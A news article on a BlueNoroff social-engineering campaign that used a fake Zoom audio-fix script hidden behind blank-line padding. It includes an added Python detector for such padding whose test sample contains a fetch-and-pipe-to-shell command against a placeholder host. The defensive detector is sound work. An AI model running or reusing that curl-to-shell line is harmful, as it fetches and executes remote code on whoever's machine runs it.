
BlueNoroff Hackers Exploit Zoom App to Deploy Infostealer Malware in Targeted Attacks



The Field Effect Analysis team has uncovered a targeted social engineering campaign orchestrated by the North Korean state-sponsored threat actor BlueNoroff, a financially motivated subgroup of the notorious Lazarus Group.

A Canadian online gambling provider fell victim to a meticulously crafted attack involving impersonation of a trusted contact and the Zoom platform.

Sophisticated Social Engineering Campaign

The attacker leveraged a spoofed domain, zoom-tech[.]us, to deceive the victim during a scheduled cryptocurrency-related Zoom meeting.

By exploiting audio issues as a pretext, the threat actor coerced the victim into running a malicious script disguised as a Zoom audio repair tool.

Figure: Zoom SDK Update script

According to the report, this script, with its malicious commands hidden among roughly 10,000 blank lines, initiated a chain of events that downloaded infostealer malware, ultimately compromising sensitive data including user credentials and browser profiles.
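The padding trick described above (a decoy header followed by thousands of blank lines so that the real commands sit far below what a casual viewer scrolls through) is cheap to spot mechanically. The following is an added example, not code from the article or from Field Effect: a small heuristic that measures the blank-line ratio and the longest run of blank lines in a script, and reports any non-blank lines found after that run. The thresholds and the two sample scripts are constructed assumptions; the "stage" URL in the padded sample is a labelled placeholder.

```python
"""Heuristic detector for scripts that hide commands behind long blank-line padding.

Added example; not from the article or from Field Effect. The thresholds
below and the sample scripts further down are assumptions built for the demo.
"""
from dataclasses import dataclass, field

# Assumed thresholds: legitimate scripts rarely contain a blank run this long
# or consist this overwhelmingly of blank lines.
MAX_BLANK_RUN = 200
MAX_BLANK_RATIO = 0.90


@dataclass
class PaddingReport:
    total_lines: int
    blank_lines: int
    longest_blank_run: int
    # Non-blank lines that appear after the longest blank run; these are the
    # commands a reader scrolling through the header would never reach.
    hidden_lines: list = field(default_factory=list)
    suspicious: bool = False


def analyze_script(text: str) -> PaddingReport:
    """Return padding statistics for a script body and flag it if suspicious."""
    lines = text.splitlines()
    blank_lines = 0
    longest_run = 0
    run = 0
    run_end = 0  # index of the first line after the longest blank run
    for i, line in enumerate(lines):
        if line.strip() == "":
            blank_lines += 1
            run += 1
            if run > longest_run:
                longest_run = run
                run_end = i + 1
        else:
            run = 0
    ratio = blank_lines / len(lines) if lines else 0.0
    hidden = []
    if longest_run >= MAX_BLANK_RUN:
        hidden = [l for l in lines[run_end:] if l.strip()]
    suspicious = longest_run >= MAX_BLANK_RUN or ratio >= MAX_BLANK_RATIO
    return PaddingReport(len(lines), blank_lines, longest_run, hidden, suspicious)


# Constructed sample mimicking the article's "audio repair" lure: a plausible
# header, 10,000 blank lines, then the real command. The URL is a placeholder.
PADDED_SAMPLE = (
    "#!/bin/bash\n"
    "# Zoom SDK Update - fixes audio issues (constructed decoy header)\n"
    "echo 'Checking audio drivers...'\n"
    + "\n" * 10000
    + "curl -s https://example.invalid/stage | sh  # constructed placeholder, not a real URL\n"
)

# Constructed benign script with ordinary spacing.
BENIGN_SAMPLE = "#!/bin/bash\n\nset -e\n\necho 'hello'\n"


if __name__ == "__main__":
    for name, sample in (("padded", PADDED_SAMPLE), ("benign", BENIGN_SAMPLE)):
        report = analyze_script(sample)
        print(name, "suspicious" if report.suspicious else "ok",
              f"blank_run={report.longest_blank_run}", f"hidden={report.hidden_lines}")
```

Running the block prints the padded sample as suspicious with a blank run of 10,000 and the trailing `curl` line surfaced as the hidden command, while the benign sample passes. A check like this belongs in an endpoint or mail-gateway pipeline that inspects scripts before a user is talked into running them; it is a heuristic, so treat a hit as a reason to open the file in a hex or text viewer, not as proof by itself.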

The infection chain employed by BlueNoroff showcases a ...


Copyright of this story solely belongs to gbhackers.